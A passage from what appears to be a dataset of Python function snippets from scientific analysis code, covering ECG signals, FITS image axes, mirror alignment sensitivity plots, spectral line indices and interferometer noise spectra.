- fi, wi, axis=-1)\n else:\n m = np.trapz(fi, wi, axis=-1)\n m = -2.5 * np.log10(m / np.ptp(wi))\n return m", "def get_normal_segment_idx(ecg, ratio_lb, ratio_ub, diagPlot=False):\n ecg_sd = ecg.std(axis=1)\n ecg_sd_med = np.median(ecg_sd)\n idx_valid = (ecg_sd < ecg_sd_med * ratio_ub) & (ecg_sd > ecg_sd_med * ratio_lb)\n\n if diagPlot:\n plt.figure()\n for i in range(ecg.shape[0]):\n if idx_valid[i] == 0:\n plt.plot(np.arange(6000) + 6000 * i, ecg[i, :], \"r-\")\n else:\n plt.plot(np.arange(6000) + 6000 * i, ecg[i, :], \"b-\")\n # plt.show()\n\n return idx_valid", "def getNbins(self,axis,includeTotalBin = True):\n\n\t\tif axis == \"f\":\n\t\t\tnCells = 1 if self.nCells == 0 else self.nCells\n\t\t\treturn nCells\n\n\t\tif axis == \"i\":\n\t\t\treturn self.meshInfo[1]\n\n\t\tif axis == \"j\":\n\t\t\treturn self.meshInfo[2]\n\n\t\tif axis == \"k\":\n\t\t\treturn self.meshInfo[3]\n\n\t\tif axis == \"d\":\n\t\t\tnDir = 1 if self.nDir == 0 else self.nDir\n\t\t\treturn nDir\n\n\t\tif axis == \"u\":\n\t\t\tnUsr = 1 if self.nUsr == 0 else self.nUsr\n\t\t\tnUsr = nUsr - 1 if self.usrTC == \"t\" and not includeTotalBin else nUsr\n\t\t\treturn nUsr\n\n\t\tif axis == \"s\":\n\t\t\tnSeg = 1 if self.nSeg == 0 else self.nSeg\n\t\t\tnSeg = nSeg - 1 if self.segTC == \"t\" and not includeTotalBin else nSeg\n\t\t\treturn nSeg\n\n\t\tif axis == \"m\":\n\t\t\tnMul = 1 if self.nMul == 0 else self.nMul\n\t\t\tnMul = nMul - 1 if self.mulTC == \"t\" and not includeTotalBin else nMul\n\t\t\treturn nMul\n\n\t\tif axis == \"c\":\n\t\t\tnCos = 1 if self.nCos == 0 else self.nCos\n\t\t\tnCos = nCos - 1 if self.cosTC == \"t\" and not includeTotalBin else nCos\n\t\t\treturn nCos\n\n\t\tif axis == \"e\":\n\t\t\tnErg = 1 if self.nErg == 0 else self.nErg\n\t\t\tnErg = nErg - 1 if self.ergTC == \"t\" and not includeTotalBin else nErg\n\t\t\treturn nErg\n\n\t\tif axis == \"t\":\n\t\t\tnTim = 1 if self.nTim == 0 else self.nTim\n\t\t\tnTim = nTim - 1 if self.timTC == \"t\" and not includeTotalBin else nTim\n\t\t\treturn nTim", "def feature_axes(self):\n raise NotImplementedError()", "def _output_axes(self, in_obj, pad_int):\n output_axes = ng.make_axes()\n for ax in in_obj.axes:\n name = ax.name\n if name in self.conv_axis_names:\n output_axes += ng.make_axis(name=ax.name,\n length=utils.deconv_output_dim(ax.length,\n self.filter_shape[name],\n pad_int[name],\n self.strides[name],\n self.dilation[name]))\n elif name == \"C\":\n output_axes += ng.make_axis(name=name, length=self.nout)\n else:\n output_axes += ax\n\n return output_axes", "def hapaxes_parts(corpus_parts):\n hapaxes = [] \n l = [] \n for part in corpus_parts:\n fd = freq_dist(part)\n hapaxes.append(fd.hapaxes())\n \n for x in range(len(hapaxes)): \n p = []\n for hapax in hapaxes[x]:\n if hapax not in l:\n p.append(hapax)\n hapaxes[x] = p\n l.extend(hapaxes[x])\n\n number_hapaxes = [len(sub_hapaxes) for sub_hapaxes in hapaxes]\n return number_hapaxes", "def comp_amplification_index(self):\n \n self.grid_tuning_in=self.inputs.grid_tuning_in\n self.grid_tuning_out=gl.comp_grid_tuning_index(self.L,self.nx,(self.r[0:self.n_e**2,:]).T) \n self.grid_tuning_out_inhib=gl.comp_grid_tuning_index(self.L,self.nx,(self.r[self.n_e**2:,:]).T)\n\n self.grid_amp_index=self.grid_tuning_out/self.grid_tuning_in", "def _index(self):\n bFirstCall = super(PageXmlSeparatorRegion, self)._index()\n \n if bFirstCall:\n # indexing was required\n # , so first call\n # , so we need to make the computation of edges crossing separators!\n self.addSeparatorFeature()", "def layer_offsets(self):\n 
...", "def refractive_index(self):\n wd = np.arange(80,820,10)\n nd = self.boundary.imat.refractive_index(wd) \n\n plt.plot(wd, nd)\n\n return wd, nd", "def mesh_axes(mesh) :\n \n if (mesh.dimension() == 1) :\n # for 1D, we take the cell center points\n x = np.zeros(mesh.number_cells_x())\n x[0] = mesh.dx(0) * 0.5\n for i in range(0, mesh.number_cells_x()-1) :\n x[i + 1] = x[i] + 0.5*(mesh.dx(i) + mesh.dx(i+1))\n return x \n \n else :\n # for 2D, we take the mesh edges\n x = np.zeros(mesh.number_cells_x()+1)\n y = np.zeros(mesh.number_cells_y()+1)\n for i in range(0, mesh.number_cells_x()) :\n x[i + 1] = x[i] + mesh.dx(i)\n for j in range(0, mesh.number_cells_y()) :\n y[j + 1] = y[j] + mesh.dy(j)\n return (x, y)", "def footprint_corner_indices():", "def find_signal_morphology(rr_intervals, fs: float = 4):\n baseline = calculate_time_features(rr_intervals=rr_intervals)['baseline']\n vhr = rr_intervals - baseline\n accel_values = np.sort(vhr[vhr > 15]) # Change for right value\n decel_values = np.sort(vhr[vhr < -15]) # Change for right value\n accel_args = np.zeros(accel_values.shape, dtype=int)\n decel_args = np.zeros(decel_values.shape, dtype=int)\n acceleration_array = []\n deceleration_array = []\n k = 0\n for i, x in enumerate(vhr):\n if x in accel_values:\n accel_args[k] = int(i)\n k += 1\n # Make acceleration array of tuples (start, end)\n if np.sum(accel_values > 0):\n start = accel_args[0]\n end = accel_args[0]\n for i in range(len(accel_args) - 1):\n if (accel_args[i + 1] - accel_args[i] >= 2) or (i + 1 == len(accel_args) - 1):\n acceleration_array.append((start, end))\n start = accel_args[i + 1]\n else:\n end = accel_args[i + 1]\n # Make deceleration array of tuples (start, end)\n k = 0\n for i, x in enumerate(vhr):\n if x in decel_values:\n decel_args[k] = i\n k += 1\n if np.sum(decel_values < 0) > 2:\n start = decel_args[0]\n end = decel_args[0]\n for i in range(len(decel_args) - 1):\n if (decel_args[i + 1] - decel_args[i] >= 2) or (i + 1 == len(decel_args)):\n deceleration_array.append((start, end))\n start = decel_args[i + 1]\n else:\n end = decel_args[i + 1]\n delete_array = np.concatenate((accel_args, decel_args))\n vhr_pure = np.delete(vhr, delete_array)\n AmpStd = np.sqrt(np.mean(np.square(vhr_pure)))\n return baseline, AmpStd, acceleration_array, deceleration_array", "def parse_mesh_point(self,sections,section_handlers):\n\n for (section_name,tokenized_lines) in sections:\n if section_name in section_handlers:\n section_handlers[section_name](self,tokenized_lines)", "def direction(self):\n import pylab\n i = 0\n j = 0\n vals = []\n vects = []\n kpx = self.keypoints.x\n kpy = self.keypoints.y\n sigma = self.keypoints.sigma\n img = self.raw\n pylab.figure()\n pylab.imshow(img, interpolation='nearest')\n\n for y, x, s in zip(kpy, kpx, sigma):\n s_patch = numpy.trunc(s * 2)\n\n if s_patch % 2 == 0 :\n s_patch += 1\n\n if s_patch < 3 : s_patch = 3\n\n if (x > s_patch / 2 and x < img.shape[1] - s_patch / 2 - 1 and y > s_patch / 2 and y < img.shape[0] - s_patch / 2):\n\n patch = img[y - (s_patch - 1) / 2:y + (s_patch - 1) / 2 + 1, x - (s_patch - 1) / 2:x + (s_patch - 1) / 2 + 1]\n x_patch = numpy.arange(s_patch)\n Gx = numpy.exp(-4 * numpy.log(2) * (x_patch - numpy.median(x_patch)) ** 2 / s)\n Gy = Gx[:, numpy.newaxis]\n dGx = -Gx * 4 * numpy.log(2) / s * 2 * (x_patch - numpy.median(x_patch))\n dGy = dGx[:, numpy.newaxis]\n d2Gx = -8 * numpy.log(2) / s * ((x_patch - numpy.median(x_patch)) * dGx + Gx)\n d2Gy = d2Gx[:, numpy.newaxis]\n\n Hxx = d2Gx * Gy\n Hyy = d2Gy * Gx\n Hxy = 
dGx * dGy\n\n d2x = (Hxx.ravel() * patch.ravel()).sum()\n d2y = (Hyy.ravel() * patch.ravel()).sum()\n dxy = (Hxy.ravel() * patch.ravel()).sum()\n H = numpy.array([[d2y, dxy], [dxy, d2x]])\n val, vect = numpy.linalg.eig(H)\n\n# print 'new point'\n# print x, y\n# print val\n# print vect\n# print numpy.dot(vect[0],vect[1])\n e = numpy.abs(val[0] - val[1]) / numpy.abs(val[0] + val[1])\n j += 1\n# print j\n# print e\n if numpy.abs(val[1]) < numpy.abs(val[0]): # reorganisation des valeurs propres et vecteurs propres\n val[0],val[1] = val[1],val[0]\n vect = vect[-1::-1,:]\n\n\n pylab.annotate(\"\", xy=(x + vect[0][0] * val[0], y + vect[0][1] * val[0]), xytext=(x, y),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n\n pylab.annotate(\"\", xy=(x + vect[1][0] * val[1], y + vect[1][1] * val[1]), xytext=(x, y),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n pylab.plot(x, y, 'og')\n vals.append(val)\n vects.append(vect)\n return vals, vects", "def _format_cont_ins(col: str, data: Dict[str, Any], nrows: int, cfg: Config) -> Any:\n # list of insights\n ins: List[Dict[str, str]] = []\n\n if data[\"chisq\"][1] > cfg.insight.uniform__threshold:\n ins.append({\"Uniform\": f\"/*start*/{col}/*end*/ is uniformly distributed\"})\n\n pmiss = round((1 - (data[\"npres\"] / nrows)) * 100, 2)\n if pmiss > cfg.insight.missing__threshold:\n nmiss = nrows - data[\"npres\"]\n ins.append({\"Missing\": f\"/*start*/{col}/*end*/ has {nmiss} ({pmiss}%) missing values\"})\n\n if data[\"skew\"][1] < cfg.insight.skewed__threshold:\n ins.append({\"Skewed\": f\"/*start*/{col}/*end*/ is skewed\"})\n\n pinf = round((data[\"npres\"] - data[\"nreals\"]) / nrows * 100, 2)\n if pinf >= cfg.insight.infinity__threshold:\n ninf = data[\"npres\"] - data[\"nreals\"]\n ins.append({\"Infinity\": f\"/*start*/{col}/*end*/ has {ninf} ({pinf}%) infinite values\"})\n\n pzero = round(data[\"nzero\"] / nrows * 100, 2)\n if pzero > cfg.insight.zeros__threshold:\n nzero = data[\"nzero\"]\n ins.append({\"Zeros\": f\"/*start*/{col}/*end*/ has {nzero} ({pzero}%) zeros\"})\n\n pneg = round(data[\"nneg\"] / nrows * 100, 2)\n if pneg > cfg.insight.negatives__threshold:\n nneg = data[\"nneg\"]\n ins.append({\"Negatives\": f\"/*start*/{col}/*end*/ has {nneg} ({pneg}%) negatives\"})\n\n if data[\"norm\"][1] > cfg.insight.normal__threshold:\n ins.append({\"Normal\": f\"/*start*/{col}/*end*/ is normally distributed\"})\n\n # list of insight messages\n ins_msg_list = [list(insight.values())[0] for insight in ins]\n\n return ins_msg_list, ins", "def getMeasures():", "def dimension(self):", "def get_entang(self, axes_subset):\n self.x_axes = list(axes_subset)\n num_x_axes = len(self.x_axes)\n num_row_axes = len(self.den_mat.row_shape)\n self.y_axes = [k for k in range(num_row_axes) if k not in self.x_axes]\n num_y_axes = len(self.y_axes)\n self.Dxy = self.den_mat.get_rho_xy(self.x_axes, self.y_axes)\n Dxy_a = []\n\n # initial Dxy_a\n # Dxy_a[0] = Dxy,\n # all others are max entangled\n dm_max_ent = DenMat(self.Dxy.num_rows, self.Dxy.row_shape)\n x_axes0 = list(range(num_x_axes))\n y_axes0 = list(range(num_x_axes, num_row_axes, 1))\n max_ent_st = MaxEntangState(dm_max_ent.num_rows, dm_max_ent.row_shape,\n x_axes0, y_axes0)\n EntangCase.check_max_entang_st(max_ent_st)\n st_vec = max_ent_st.get_st_vec()\n entang = max_ent_st.get_known_entang()\n dm_max_ent.set_arr_from_st_vec(st_vec)\n # print('dddddd dm max ent', dm_max_ent.arr)\n for alp in range(self.num_hidden_states):\n if alp == 0:\n Dxy_alp = self.Dxy\n else:\n Dxy_alp = dm_max_ent\n 
Dxy_a.append(Dxy_alp)\n\n for step in range(self.num_ab_steps):\n if self.verbose:\n print('------------ab step=', step)\n print('entang=', entang)\n entang, Dxy_a = self.next_step(Dxy_a)\n if self.verbose:\n print('-----------\\nfinal entang=', entang)\n return entang", "def nominalSensitivities():\n #Scan ranges\n ang = np.linspace(-5*.3e-3,5*.3e-3,100)\n tx = np.linspace(-.3,.3,100)\n\n #Mirror Pair Sensitivities\n pitch2 = [mirrorPair(1000,primalign=[0,0,0,0,a,0]) for a in ang]\n yaw2 = [mirrorPair(1000,primalign=[0,0,0,a,0,0]) for a in ang]\n plt.figure('Pair')\n plt.plot(ang*180/pi*60,pitch2,label='Pitch')\n plt.plot(ang*180/pi*60,yaw2,label='Yaw')\n plt.title('SLF Mirror Pair Alignment Sensitivities')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Angular Error (arcmin)')\n plt.ylabel('HPD (arcsec)')\n\n #Secondary Sensitivities\n pitch = [mirrorPair(1000,secalign=[0,0,0,0,a,0]) for a in ang/20]\n yaw = [mirrorPair(1000,secalign=[0,0,0,a,0,0]) for a in ang/20]\n roll = [mirrorPair(1000,secalign=[0,0,0,0,0,a]) for a in ang/20]\n plt.figure('SecondaryAng')\n plt.semilogy(ang/20.*180/pi*60**2,pitch,label='Pitch')\n plt.plot(ang/20.*180/pi*60**2,yaw,label='Yaw')\n plt.plot(ang/20.*180/pi*60**2,roll,label='Roll')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Angular Error (arcsec)')\n plt.ylabel('HPD (arcsec)')\n plt.xlim([-5,5])\n plt.ylim([0,3])\n plt.title('SLF Secondary Alignment Sensitivities')\n decenter = [mirrorPair(1000,secalign=[t,0,0,0,0,0]) for t in tx]\n lateral = [mirrorPair(1000,secalign=[0,t,0,0,0,0]) for t in tx]\n despace = [mirrorPair(1000,secalign=[0,0,t,0,0,0]) for t in tx]\n plt.figure('SecondaryTx')\n plt.semilogy(tx,decenter,label='Decenter')\n plt.plot(tx,despace,label='Despace')\n plt.plot(tx,lateral,label='Lateral')\n plt.grid()\n plt.legend(loc='upper center')\n plt.xlabel('Translation Error (mm)')\n plt.ylabel('HPD (arcsec)')\n plt.title('SLF Secondary Translation Sensitivities')\n \n \n #Compensating behavior...\n \n\n return [pitch2,yaw2,pitch,yaw,decenter,lateral,despace]", "def _make_axes(self, hdr, quiet=False, novec=False, vonly=False, simple=False):\n\n # PULL THE IMAGE/CUBE SIZES FROM THE HEADER\n naxis = int(hdr['NAXIS'])\n naxis1 = int(hdr['NAXIS1'])\n naxis2 = int(hdr['NAXIS2'])\n if naxis > 2:\n naxis3 = hdr['NAXIS3']\n\n ## EXTRACT FITS ASTROMETRY STRUCTURE\n ww = astropy.wcs.WCS(hdr)\n\n #IF DATASET IS A CUBE THEN WE MAKE THE THIRD AXIS IN THE SIMPLEST WAY POSSIBLE (NO COMPLICATED ASTROMETRY WORRIES FOR FREQUENCY INFORMATION)\n if naxis > 3:\n #GRAB THE RELEVANT INFORMATION FROM THE ASTROMETRY HEADER\n cd = ww.wcs.cd\n crpix = ww.wcs.crpix\n cdelt = ww.wcs.crelt\n crval = ww.wcs.crval\n\n if naxis > 2:\n # MAKE THE VELOCITY AXIS (WILL BE M/S)\n v = np.arange(naxis3) * 1.0\n vdif = v - (hdr['CRPIX3']-1)\n vaxis = (vdif * hdr['CDELT3'] + hdr['CRVAL3'])\n\n # CUT OUT HERE IF WE ONLY WANT VELOCITY INFO\n if vonly:\n return vaxis\n\n #IF 'SIMPLE' IS CALLED THEN DO THE REALLY TRIVIAL THING:\n if simple:\n print('Using simple aproach to make axes.')\n print('BE SURE THIS IS WHAT YOU WANT! It probably is not.')\n raxis = np.arange(naxis1) * 1.0\n rdif = raxis - (hdr['CRPIX1'] - 1)\n raxis = (rdif * hdr['CDELT1'] + hdr['CRVAL1'])\n\n daxis = np.arange(naxis2) * 1.0\n ddif = daxis - (hdr['CRPIX1'] - 1)\n daxis = (ddif * hdr['CDELT1'] + hdr['CRVAL1'])\n\n rimg = raxis # (fltarr(naxis2) + 1.)\n dimg = (np.asarray(naxis1) + 1.) 
# daxis\n return rimg, dimg\n\n # OBNOXIOUS SFL/GLS THING\n glspos = ww.wcs.ctype[0].find('GLS')\n if glspos != -1:\n ctstr = ww.wcs.ctype[0]\n newtype = 'SFL'\n ctstr.replace('GLS', 'SFL')\n ww.wcs.ctype[0] = ctstr\n print('Replaced GLS with SFL; CTYPE1 now =' + ww.wcs.ctype[0])\n\n glspos = ww.wcs.ctype[1].find('GLS')\n if glspos != -1:\n ctstr = ww.wcs.ctype[1]\n newtype = 'SFL'\n ctstr.replace('GLS', 'SFL')\n ww.wcs.ctype[1] = ctstr\n print('Replaced GLS with SFL; CTYPE2 now = ' + ww.wcs.ctype[1])\n\n # CALL 'xy2ad' TO FIND THE RA AND DEC FOR EVERY POINT IN THE IMAGE\n if novec:\n rimg = np.zeros((naxis1, naxis2))\n dimg = np.zeros((naxis1, naxis2))\n for i in range(naxis1):\n j = np.asarray([0 for i in xrange(naxis2)])\n\n pixcrd = np.array([[zip(float(i), float(j))]], numpy.float_)\n ra, dec = ww.all_pix2world(pixcrd, 1)\n\n rimg[i, :] = ra\n dimg[i, :] = dec\n else:\n ximg = np.arange(naxis1) * 1.0\n yimg = np.arange(naxis1) * 1.0\n X, Y = np.meshgrid(ximg, yimg, indexing='xy')\n ss = X.shape\n xx, yy = X.flatten(), Y.flatten()\n\n pixcrd = np.array(zip(xx, yy), np.float_)\n img_new = ww.all_pix2world(pixcrd, 0)\n rimg_new, dimg_new = img_new[:,0], img_new[:,1]\n\n rimg = rimg_new.reshape(ss)\n dimg = dimg_new.reshape(ss)\n\n # GET AXES FROM THE IMAGES. USE THE CENTRAL COLUMN AND CENTRAL ROW\n raxis = np.squeeze(rimg[:, naxis2/2])\n daxis = np.squeeze(dimg[naxis1/2, :])\n\n return rimg, dimg", "def InferElementalDimension(self):\n\n assert self.element_type is not None\n\n if self.element_type == \"tet\" or self.element_type == \"hex\":\n self.edim = 3\n elif self.element_type == \"tri\" or self.element_type == \"quad\" or self.element_type == \"pent\":\n self.edim = 2\n elif self.element_type == \"line\":\n self.edim = 1\n else:\n raise RuntimeError(\"Could not infer element type\")\n\n return self.edim", "def getPlotData(integrated):\n\tglobal normalized\n\tg1 = integrated.split(\"_\")[0]\n\tg2 = integrated.split(\"_\")[1] \n\tcompAxis = []\n\twarmthAxis = []\n\tgetMappingsWarmth = parser.getMappings(normalized)[0]\n\tgetMappingsComp = parser.getMappings(normalized)[1]\n\tintWarmthMap, intCompMap = parser.extractInformation(getMappingsWarmth, getMappingsComp)\n\n\t#using mean and standard deviation computed from 18aug16 data: \n\tcompAxis.append(intCompMap[g1][0]) #group 1\n\tcompAxis.append(intCompMap[g2][0]) #group 2\n\n\tcompAxis.append(intCompMap[integrated][0]) #combined observed\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\tcompPrediction = getCombination(float(intCompMap[g1][0]), float(intCompMap[g2][0]), float(intCompMap[g1][1]), float(intCompMap[g2][1]), float(intCompMap[g1][2]), float(intCompMap[g2][2]))\n\t\n\tcompAxis.append(compPrediction[0]) #combined predicted\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\twarmthAxis.append(intWarmthMap[g1][0])\n\twarmthAxis.append(intWarmthMap[g2][0])\n\t\n\twarmthAxis.append(intWarmthMap[integrated][0])\n\t\n\t#using mean and standard deviation computed from 18aug16 data: \n\twarmthPrediction = getCombination(float(intWarmthMap[g1][0]), float(intWarmthMap[g2][0]), float(intWarmthMap[g1][1]), float(intWarmthMap[g2][1]), float(intWarmthMap[g1][2]), float(intWarmthMap[g2][2]))\n\t\n\twarmthAxis.append(warmthPrediction[0])\n\treturn warmthAxis, compAxis", "def dimension_finder(self, text_header):\r\n dimension = re.search('\\d+x\\d+',text_header).group()\r\n dimension1 = re.findall('\\d+',dimension)[0]\r\n dimension1 = float(dimension1)\r\n dimension2 = 
re.findall('\\d+',dimension)[1]\r\n dimension2 = float(dimension2)\r\n return (dimension1,dimension2)", "def xx(self):\n return self.exterior[:, 0]", "def flatNoiseCGH():\n #Get data\n wdir = '/home/rallured/Dropbox/AXRO/Metrology/NoiseStudy/FlatMeasurements/'\n d1,dx1 = met.read4DFits(wdir+'161205_RefFlat_Avg8_Meas1.fits')\n d2,dx2 = met.read4DFits(wdir+'161205_RefFlat_Avg8_Meas2.fits')\n p1,px1 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestPitch_Meas1.fits')\n p2,px2 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestPitch_Meas2.fits')\n p3,px3 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestRoll_Meas1.fits')\n p4,px4 = met.read4DFits(wdir+'161205_RefFlat_ParrotingTestRoll_Meas2.fits')\n\n #Construct baseline power spectra\n f1,pow1 = fourier.meanPSD(d1-d2,win=np.hanning,dx=dx1)\n f2,pow2 = fourier.meanPSD(d1-d2,win=np.hanning,dx=dx1,axis=1)\n \n #Construct parroted power spectra\n f3,pow3 = fourier.meanPSD(p1-p2,win=np.hanning,dx=dx1)\n f4,pow4 = fourier.meanPSD(p1-p2,win=np.hanning,dx=dx2,axis=1)\n f5,pow5 = fourier.meanPSD(p3-p4,win=np.hanning,dx=dx1)\n f6,pow6 = fourier.meanPSD(p3-p4,win=np.hanning,dx=dx2,axis=1)\n\n #Plot\n plt.loglog(f1,pow1/f1[0],label='Axial Baseline')\n plt.loglog(f2,pow2/f2[0],label='Azimuthal Baseline')\n plt.loglog(f3,pow3/f3[0],label='Pitch Axial')\n plt.loglog(f4,pow4/f4[0],label='Pitch Azimuthal')\n plt.loglog(f5,pow5/f5[0],label='Roll Axial')\n plt.loglog(f6,pow6/f6[0],label='Roll Azimuthal')\n plt.title('Residual Fringe Repeatability Impact')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n plt.legend(loc='lower left')\n\n return f1,pow1", "def getVisualFieldOrigin(self):\r\n\r\n if not hasattr(self, 'finalPatchesMarked'):\r\n raise LookupError('Please mark the final patches first!!')\r\n\r\n if not hasattr(self, 'altPosMapf'):\r\n _ = self._getSignMap()\r\n\r\n try:\r\n V1 = self.finalPatchesMarked['V1'].array.astype(np.float)\r\n LM = self.finalPatchesMarked['LM'].array.astype(np.float)\r\n RL = self.finalPatchesMarked['RL'].array.astype(np.float)\r\n\r\n overlap = 0 # number of overlaping pixels\r\n iterNum = 1 # number of iteration\r\n while overlap < 1:\r\n # print 'Iteration number for finding overlapping pixel:', iterNum\r\n V1 = ni.morphology.binary_dilation(V1, iterations=1).astype(np.float)\r\n LM = ni.morphology.binary_dilation(LM, iterations=1).astype(np.float)\r\n RL = ni.morphology.binary_dilation(RL, iterations=1).astype(np.float)\r\n totalField = V1 + LM + RL\r\n # plt.imshow(totalField)\r\n overlap = len(np.argwhere(totalField == 3))\r\n iterNum += 1\r\n # print 'Number of overlapping pixels:', overlap\r\n # plt.show()\r\n\r\n altPosOrigin = np.mean(self.altPosMapf[totalField == 3], axis=0)\r\n aziPosOrigin = np.mean(self.aziPosMapf[totalField == 3], axis=0)\r\n\r\n except KeyError:\r\n print('Can not find necessary visual areas (V1, LM, RL) for normalization. 
\\nSetting origins to 0 ...')\r\n altPosOrigin = 0.\r\n aziPosOrigin = 0.\r\n\r\n return altPosOrigin, aziPosOrigin", "def _appendAxisDefinition(self, axis):\n length = len(axis)\n\n self.na_dict[\"NX\"].append(length)\n self.na_dict[\"XNAME\"].append(xarray_utils.getBestName(axis))\n\n # If only one item in axis values\n if length < 2:\n self.na_dict[\"DX\"].append(0)\n self.na_dict[\"NXDEF\"].append(length)\n self.na_dict[\"X\"].append(axis.data.tolist()) \n return\n\n incr = xarray_utils.get_interval(axis, 0, 1)\n\n for i in range(1, length):\n if (axis[i] - axis[i - 1]) != incr:\n self.na_dict[\"DX\"].append(0)\n self.na_dict[\"NXDEF\"].append(length)\n self.na_dict[\"X\"].append(axis.data.tolist())\n break\n\n else: # If did not break out of the loop\n max_length = length\n if length > 3: \n max_length = 3\n\n self.na_dict[\"DX\"].append(incr)\n self.na_dict[\"NXDEF\"].append(max_length)\n self.na_dict[\"X\"].append(axis[:max_length])", "def _cte_postformat(self):\n# if type(self.idxs) == list:\n# self.idxs = np.array(self.idxs)\n if self.sp_relative_pos is not None:\n if type(self.sp_relative_pos) == list:\n self.sp_relative_pos = np.array(self.sp_relative_pos)", "def calc_ind(sel_lines):\n\n print()\n print(\"CALCULATING INDICES\")\n print(\"-------------------\")\n\n # remove duplicates of ind_id and gives a list of selected indices\n sel_ind = list(set(sel_lines['ind_id']))\n sel_ind = np.asarray(sel_ind)\n\n index = {}\n index['index'] = []\n index['value'] = []\n index['error'] = []\n index['flg'] = []\n index['mfrac_neg'] = []\n index['snr'] = []\n\n print(\"index\\tvalue\\terror\\t\\tsnr\\tflag\\tmfrac_neg\")\n print(\"-----\\t-----\\t-----\\t\\t---\\t----\\t---------\")\n\n ind_ids = np.asarray(sel_lines['ind_id'])\n rows = len(sel_lines['ln_id'])\n for i in range(len(sel_ind)): # each index\n\n var = [sel_lines['ind_var'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n flux = [sel_lines['flux'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n err = [sel_lines['error'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n flg = [sel_lines['flg'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n frac_neg = [sel_lines['frac_neg'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n snr = [sel_lines['snr'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n ln_c = [sel_lines['ln_c'][k] for k in range(rows) \\\n if ind_ids[k] == sel_ind[i]]\n\n # Maximum fraction of flux with negative values of all lines in index\n mfrac_neg = max(frac_neg)\n\n if \"negFlux\" in flg: flg_ind = 'negFlux'\n else: flg_ind = None\n\n # Median snr of index bandpasses:\n if snr is None or snr[0] is None:\n snr_ind = None\n else:\n snr_ind = np.median(snr)\n\n for k in range(len(var)):\n if 'L' not in var[k] and 'R' not in var[k]:\n msg=\"*** ERROR: 'ind_var' variable (in config file config_lines.txt) must start with either an 'L' for core line or 'R' for reference line. 
Value given was '{}'\".format(var[k])\n sys.exit(msg)\n\n # Add line variables for numerator or denominator:\n num = [ln_c[k]*flux[k] for k in range(len(var)) if 'L' in var[k]]\n num_err = [ln_c[k]*err[k] for k in range(len(var)) if 'L' in var[k]]\n denom = [ln_c[k]*flux[k] for k in range(len(var)) if 'R' in var[k]]\n denom_err = [ln_c[k]*err[k] for k in range(len(var)) if 'R' in var[k]]\n\n num = np.asarray(num)\n denom = np.asarray(denom)\n num_err = np.asarray(num_err)\n denom_err = np.asarray(denom_err)\n\n ind = sum(num) / sum(denom)\n\n # Error using propagation of errors for lines and ref lines\n ind_err = np.sqrt(sum(num_err**2) + ind**2 * sum(denom_err**2)) /sum(denom)\n\n if snr_ind: snr_ind = round(snr_ind, 2)\n\n index['index'].append(sel_ind[i])\n index['value'].append(ind)\n index['error'].append(ind_err)\n index['flg'].append(flg_ind)\n index['mfrac_neg'].append(mfrac_neg)\n index['snr'].append(snr_ind)\n\n print(\"{}\\t{:.4f}\\t{:.6f}\\t{}\\t{}\\t{:.4f}\".format(index['index'][i], index['value'][i], index['error'][i], index['snr'][i], index['flg'][i], index['mfrac_neg'][i]))\n\n return index", "def side_traces(x,im):\n s0 = x['side-traces'][0]\n s1 = x['side-traces'][1]\n t1 = Scatter(y=s0)\n t2 = Scatter(y=s1)\n\n #put_thing(im,x['abs-line'],(255,0,0),(0,0),3)\n\n groups = []\n diff_traces = []\n markers = []\n y3 = []\n TriangleHumps.get_dimensions(x,debug_groups=groups,debug_diffs=diff_traces,debug_markers = markers, im = im,y3=y3)\n mode = stats.mode(y3)[0][0]\n trigger = mode*2+1\n t3 = Scatter(y=y3)\n\n annotations = []\n diff_traces = [Scatter(y=v) for v in diff_traces]\n t4 = Scatter(x=markers,y=[10]*len(markers),mode = 'markers+text')\n for gru in groups:\n for hump in gru:\n annotations.append({\n 'x':hump['range'][0],\n 'y':trigger,\n 'text':'%d,%d'%(hump['area'],hump['length']),\n })\n\n name = 'mode=%d,trigger=%d,groups=%d' % (mode,trigger,len(groups))\n \n #return (t1,t2,t3,)\n #print('markers %d:' % x['id'],markers,[trigger]*len(markers))\n return [t3,t4,] + diff_traces,annotations, name", "def investigate4DRepeatability():\n parentdir = '/home/rallured/Dropbox/Interferometer/SolarBFlat/Repeatability/'\n avgs = [1,2,4,8,16,32]\n\n #Temporal with fringes tilted\n fn = glob.glob(parentdir+'Tilt/17*RepeatabilityTiltTemporal*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = np.array([met.readFlatScript(fi.split('.')[0])[0] for fi in fn])\n #Make progressive averaging plot\n plt.figure('TemporalTiltedFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Temporal,Tilted')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n reptemptilt = d[-1]-d[-2]\n figtemptilt = d[-1]\n\n #Dynamic with fringes tilted\n fn = glob.glob(parentdir+'Tilt/17*RepeatabilityTilt_*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = [met.readFlatScript(fi.split('.')[0])[0] for fi in fn]\n #Make progressive averaging plot\n plt.figure('DynamicTiltedFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower 